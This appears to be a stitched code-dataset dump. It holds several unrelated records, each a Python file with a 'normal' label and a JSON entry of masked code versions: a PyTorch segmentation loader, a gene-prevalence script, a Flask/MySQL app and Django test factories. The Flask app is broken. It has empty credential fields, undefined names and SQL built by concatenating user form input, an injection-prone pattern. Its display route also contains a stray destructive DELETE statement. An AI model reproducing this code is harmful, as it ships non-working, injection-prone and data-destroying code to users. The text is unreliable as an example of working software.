mask_suffix = '_mask.png'
img_suffix = '.png'
self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if
bg_mask_name.endswith(mask_suffix)]
self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]
ng_imgs_dir = os.path.join(train_dir, 'ng')
self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if
ng_img_name.endswith(mask_suffix)]
self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]
self.augmentation = augmentation
self.preprocessing = preprocessing
def __len__(self):
return len(self.bg_masks_path) + len(self.ng_masks_path)
def __getitem__(self, item):
# bg
if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:
random_id_bg = np.random.randint(0, len(self.bg_imgs_path))
img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]
# ng
else:
random_id_ng = np.random.randint(0, len(self.ng_imgs_path))
img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]
img = cv2.imread(img_path)
mask = cv2.imread(mask_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# apply augmentations
if self.augmentation:
sample = self.augmentation(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=img, mask=mask)
img, mask = sample['image'], sample['mask']
return img, mask
|
normal
|
{
"blob_id": "9928eaa32468453f405d8bb650f3e0e85a7933bf",
"index": 5514,
"step-1": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n <mask token>\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-2": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n <mask token>\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-3": "<mask token>\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-4": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for\n bg_mask_name in os.listdir(bg_imgs_dir) if bg_mask_name.\n endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for\n bg_mask_path in self.bg_masks_path]\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for\n ng_img_name in os.listdir(ng_imgs_dir) if ng_img_name.endswith(\n mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for\n ng_mask_path in self.ng_masks_path]\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg\n ], self.bg_masks_path[random_id_bg]\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng\n ], self.ng_masks_path[random_id_ng]\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-5": "import os\nimport cv2\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torchvision\nfrom torchvision import transforms\nfrom utils.utils import loadYaml\nfrom .base_datalayer import BaseDataLayer\nimport albumentations as albu\n\n\nclass Datalayer(BaseDataLayer):\n\n def __init__(self, config, augmentation=None, preprocessing=None):\n super(Datalayer, self).__init__()\n self.config = config\n train_dir = self.config['Dataset']['TrainPath']\n\n bg_imgs_dir = os.path.join(train_dir, 'bg')\n\n mask_suffix = '_mask.png'\n img_suffix = '.png'\n self.bg_masks_path = [os.path.join(bg_imgs_dir, bg_mask_name) for bg_mask_name in os.listdir(bg_imgs_dir) if\n bg_mask_name.endswith(mask_suffix)]\n self.bg_imgs_path = [bg_mask_path.replace(mask_suffix, img_suffix) for bg_mask_path in self.bg_masks_path]\n\n ng_imgs_dir = os.path.join(train_dir, 'ng')\n self.ng_masks_path = [os.path.join(ng_imgs_dir, ng_img_name) for ng_img_name in os.listdir(ng_imgs_dir) if\n ng_img_name.endswith(mask_suffix)]\n self.ng_imgs_path = [ng_mask_path.replace(mask_suffix, img_suffix) for ng_mask_path in self.ng_masks_path]\n\n self.augmentation = augmentation\n self.preprocessing = preprocessing\n\n def __len__(self):\n return len(self.bg_masks_path) + len(self.ng_masks_path)\n\n def __getitem__(self, item):\n # bg\n if np.random.random() > 0.5 and len(self.bg_masks_path) > 0:\n random_id_bg = np.random.randint(0, len(self.bg_imgs_path))\n img_path, mask_path = self.bg_imgs_path[random_id_bg], self.bg_masks_path[random_id_bg]\n # ng\n else:\n random_id_ng = np.random.randint(0, len(self.ng_imgs_path))\n img_path, mask_path = self.ng_imgs_path[random_id_ng], self.ng_masks_path[random_id_ng]\n\n img = cv2.imread(img_path)\n mask = cv2.imread(mask_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # apply augmentations\n if self.augmentation:\n sample = self.augmentation(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n # apply preprocessing\n if self.preprocessing:\n sample = self.preprocessing(image=img, mask=mask)\n img, mask = sample['image'], sample['mask']\n return img, mask\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from collections import Counter, defaultdict
import pandas as pd
from glob import glob
import subsamplex
files = glob('outputs.txt/*.unique.txt.gz')
files.sort()
biome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)
duplicates = set(line.strip() for line in open('cold/duplicates.txt'))
counts = defaultdict(Counter)
skipped = 0
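# for each sample: skip duplicates and shallow samples, subsample to 1M reads, and record which genes are present per biome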
for i, fname in enumerate(files):
sample = fname.split('/')[1].split('.')[0]
if sample in duplicates:
skipped += 1
if skipped % 100 == 99:
print(f'Skip {skipped}')
continue
f = pd.read_table(fname, index_col=0, squeeze=True)
if f.sum() < 1_000_000:
skipped += 1
if skipped % 100 == 99:
print(f'Skip {skipped}')
continue
f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000*1000)
f = f[f>0]
counts[biome[sample]].update(f.index)
if i % 100 == 99:
print("Done {}/{}".format(i+1, len(files)))
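# assemble the per-biome prevalence table, add an overall column, and write feather + TSV outputs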
recounts = pd.DataFrame({k:pd.Series(v) for k, v in counts.items()})
recounts.fillna(0, inplace=True)
used_total = recounts.sum(1)
recounts['all'] = used_total
recounts = recounts.astype(int)
recounts.reset_index(inplace=True)
recounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')
names = [line.strip() for line in open('cold/derived/GMGC10.headers')]
recounts.set_index('index', inplace=True)
recounts.index = recounts.index.map(names.__getitem__)
recounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\t')
|
normal
|
{
"blob_id": "74eea67b8640a03e616bebdadba49891017b921d",
"index": 8914,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfiles.sort()\n<mask token>\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\n<mask token>\nrecounts.fillna(0, inplace=True)\n<mask token>\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\n<mask token>\nrecounts.set_index('index', inplace=True)\n<mask token>\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-3": "<mask token>\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\ncounts = defaultdict(Counter)\nskipped = 0\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\nrecounts = pd.DataFrame({k: pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-4": "from collections import Counter, defaultdict\nimport pandas as pd\nfrom glob import glob\nimport subsamplex\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\ncounts = defaultdict(Counter)\nskipped = 0\nfor i, fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1000000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000 * 1000)\n f = f[f > 0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print('Done {}/{}'.format(i + 1, len(files)))\nrecounts = pd.DataFrame({k: pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n",
"step-5": "from collections import Counter, defaultdict\nimport pandas as pd\nfrom glob import glob\nimport subsamplex\n\nfiles = glob('outputs.txt/*.unique.txt.gz')\nfiles.sort()\nbiome = pd.read_table('cold/biome.txt', squeeze=True, index_col=0)\nduplicates = set(line.strip() for line in open('cold/duplicates.txt'))\n\ncounts = defaultdict(Counter)\nskipped = 0\nfor i,fname in enumerate(files):\n sample = fname.split('/')[1].split('.')[0]\n if sample in duplicates:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f = pd.read_table(fname, index_col=0, squeeze=True)\n if f.sum() < 1_000_000:\n skipped += 1\n if skipped % 100 == 99:\n print(f'Skip {skipped}')\n continue\n f.values.flat[:] = subsamplex.subsample(f.values.ravel(), 1000*1000)\n f = f[f>0]\n counts[biome[sample]].update(f.index)\n if i % 100 == 99:\n print(\"Done {}/{}\".format(i+1, len(files)))\n\nrecounts = pd.DataFrame({k:pd.Series(v) for k, v in counts.items()})\nrecounts.fillna(0, inplace=True)\nused_total = recounts.sum(1)\nrecounts['all'] = used_total\nrecounts = recounts.astype(int)\nrecounts.reset_index(inplace=True)\nrecounts.to_feather('tables/genes.1m.unique.prevalence.no-dups.feather')\n\nnames = [line.strip() for line in open('cold/derived/GMGC10.headers')]\nrecounts.set_index('index', inplace=True)\nrecounts.index = recounts.index.map(names.__getitem__)\nrecounts.to_csv('tables/genes.1m.unique.no-dups.prevalence.txt', sep='\\t')\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import mysql.connector
import time
from flask import Flask, render_template, request
app = Flask(__name__)
def dbconnect():
return mysql.connector.connect(user= , password= , host="mysqlshereen.mysql.database.azure.com", port=3306, database='test')
@app.route('/result', methods=['POST', 'GET'])
def query():
start_time = time.time()
display = []
conn=dbconnect()
curr=conn.cursor()
curr.execute("""
UPDATE TABLE SET columnName = null WHERE YourCondition
delete from FOOD where DIGITS >900;""")
sql=curr.fetchall()
for row in sql:
tuple = (row[0], row[1], row[3])
display.append(tuple)
end_time = time.time()
total_time = end_time - start_time
print("final time:", total_time)
display.append(total_time)
curr.close()
conn.close()
return render_template('display.html', display=display)
@app.route('/download', methods=['POST', 'GET'])
def download():
list = []
if request.method == 'POST':
mytext = request.form['text1']
mytext1 = request.form['text2']
conn = dbconnect()
curr = conn.cursor()
r1=int(mytext)
r2 = int(mytext1)
        curr.execute('select DIGITS, CATEGORY from FOOD where DIGITS > %s and DIGITS < %s', (r1, r2))
sql = curr.fetchall()
#curr.execute('select PICTURE from FOOD')
data = curr.fetchone()[0]
for row in data:
with open('/home/shereen/quiz8/static/'+name+'.jpg','w') as local_file:
local_file.write(data)
list.append(data)
#img_name = name+'.jpg'
curr.close()
conn.close()
#return img_name
return render_template('result.html',list=list,)
def insert():
conn = dbconnect()
curr = conn.cursor()
path = '/home/shereen/quiz8/data/'
for root, dirs, files in os.walk('/home/shereen/quiz8/data/'):
for file in files:
img_file = file.replace('csv', 'jpg')
print(img_file)
if file.endswith(".csv"):
with open(path + file) as f:
name = file[:-4]
lines = f.readlines()
line1 = lines[0].replace('\r', '')
line2 = lines[1].replace('\r', '')
line3 = lines[2].replace('\r', '')
with open('/home/shereen/quiz8/data/' + img_file, 'rb') as img:
image = img.read()
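                    # column mapping for the INSERT below: line1 -> digits, line2 -> ingred, line3 -> category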
sql = 'insert into FOOD (NAME,ingred,digits,category,picture) values (%s,%s,%s,%s,%s)'
args = (name,line2, line1, line3, image)
curr.execute(sql, args)
conn.commit()
def dbcount():
print('hi')
conn = dbconnect()
cur = conn.cursor()
start_time = time.time()
conn = dbconnect()
cur = conn.cursor()
quer = 'select count(*) from FOOD'
cur.execute(quer)
res = cur.fetchone()
print(res[0])
conn.commit()
cur.close()
conn.close()
end_time = time.time()
tot = end_time - start_time
cur.close()
conn.close()
return res
@app.route('/')
def hello_world():
insert()
#query()
img_name = download()
#return render_template('result.html', img_name=img_name)
return render_template('main.html')
if __name__ == '__main__':
app.run()
|
normal
|
{
"blob_id": "3314ffdbc2f10170176c590aebf49c416bcc8856",
"index": 2136,
"step-1": "import os\n\nimport mysql.connector\nimport time\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\ndef dbconnect():\n\n return mysql.connector.connect(user= , password= , host=\"mysqlshereen.mysql.database.azure.com\", port=3306, database='test')\n\n@app.route('/result', methods=['POST', 'GET'])\ndef query():\n start_time = time.time()\n display = []\n conn=dbconnect()\n curr=conn.cursor()\n curr.execute(\"\"\"\nUPDATE TABLE SET columnName = null WHERE YourCondition\ndelete from FOOD where DIGITS >900;\"\"\")\n\n sql=curr.fetchall()\n\n for row in sql:\n tuple = (row[0], row[1], row[3])\n display.append(tuple)\n end_time = time.time()\n total_time = end_time - start_time\n print(\"final time:\", total_time)\n display.append(total_time)\n curr.close()\n conn.close()\n return render_template('display.html', display=display)\n\n\n@app.route('/download', methods=['POST', 'GET'])\ndef download():\n list = []\n if request.method == 'POST':\n mytext = request.form['text1']\n mytext1 = request.form['text2']\n conn = dbconnect()\n curr = conn.cursor()\n r1=int(mytext)\n r2 = int(mytext1)\n curr.execute('select DIGITS,CATEGORY from food DIGITS \">\"' +r1+'DIGITS\"<\"'+r2)\n sql = curr.fetchall()\n #curr.execute('select PICTURE from FOOD')\n data = curr.fetchone()[0]\n for row in data:\n with open('/home/shereen/quiz8/static/'+name+'.jpg','w') as local_file:\n local_file.write(data)\n list.append(data)\n #img_name = name+'.jpg'\n\n curr.close()\n conn.close()\n #return img_name\n return render_template('result.html',list=list,)\n\n\ndef insert():\n conn = dbconnect()\n curr = conn.cursor()\n path = '/home/shereen/quiz8/data/'\n\n for root, dirs, files in os.walk('/home/shereen/quiz8/data/'):\n for file in files:\n img_file = file.replace('csv', 'jpg')\n print(img_file)\n if file.endswith(\".csv\"):\n with open(path + file) as f:\n name = file[:-4]\n lines = f.readlines()\n line1 = lines[0].replace('\\r', '')\n line2 = lines[1].replace('\\r', '')\n line3 = lines[2].replace('\\r', '')\n with open('/home/shereen/quiz8/data/' + img_file, 'rb') as img:\n image = img.read()\n sql = 'insert into FOOD (NAME,ingred,digits,category,picture) values (%s,%s,%s,%s,%s)'\n args = (name,line2, line1, line3, image)\n curr.execute(sql, args)\n conn.commit()\n\ndef dbcount():\n print('hi')\n conn = dbconnect()\n cur = conn.cursor()\n start_time = time.time()\n conn = dbconnect()\n cur = conn.cursor()\n quer = 'select count(*) from FOOD'\n cur.execute(quer)\n res = cur.fetchone()\n print(res[0])\n conn.commit()\n cur.close()\n conn.close()\n end_time = time.time()\n tot = end_time - start_time\n cur.close()\n conn.close()\n return res\n\n@app.route('/')\ndef hello_world():\n insert()\n #query()\n img_name = download()\n #return render_template('result.html', img_name=img_name)\n return render_template('main.html')\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
from services.interfaces.i_service import IService
from services.dbservices.db_service import DBService
class GetCommunitiesByOffsetService(IService):
def __init__(self, core, parameters):
super(GetCommunitiesByOffsetService, self).__init__(core, parameters)
def run(self):
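        # fetch the next block of Communities records using the start/offset parameters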
return DBService(self.core).getNextFields("Communities", self.parameters["start"], self.parameters["offset"])
|
normal
|
{
"blob_id": "051bd11c42815ec8f8ece8eae9d33890da77129c",
"index": 148,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass GetCommunitiesByOffsetService(IService):\n <mask token>\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-3": "<mask token>\n\n\nclass GetCommunitiesByOffsetService(IService):\n\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-4": "from services.interfaces.i_service import IService\nfrom services.dbservices.db_service import DBService\n\n\nclass GetCommunitiesByOffsetService(IService):\n\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields('Communities', self.\n parameters['start'], self.parameters['offset'])\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom services.interfaces.i_service import IService\nfrom services.dbservices.db_service import DBService\n\nclass GetCommunitiesByOffsetService(IService):\n def __init__(self, core, parameters):\n super(GetCommunitiesByOffsetService, self).__init__(core, parameters)\n\n def run(self):\n return DBService(self.core).getNextFields(\"Communities\", self.parameters[\"start\"], self.parameters[\"offset\"])\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
# coding: utf-8
import os
import factory
import datetime
from journalmanager import models
from django.contrib.auth.models import Group
from django.core.files.base import File
_HERE = os.path.dirname(os.path.abspath(__file__))
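# sample SPS XML and TIFF fixtures; SAMPLE_XML and SAMPLE_TIFF_IMAGE feed the Article* factories below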
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:
SAMPLE_XML = xml_file.read()
SAMPLE_TIFF_IMAGE = open(
os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:
SAMPLE_XML_RELATED = xml_file.read()
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "jmanager_username%s" % n)
first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n)
last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n)
email = factory.Sequence(lambda n: "jmanager_email%s@example.com" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: "Group #%s" % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = 'fapesp@scielo.org'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'fapesp@scielo.org'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
    init_num = u'1'
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'cbcd@cbcd.org.br'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
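        # attach a newly created Section to every Issue produced by this factory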
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
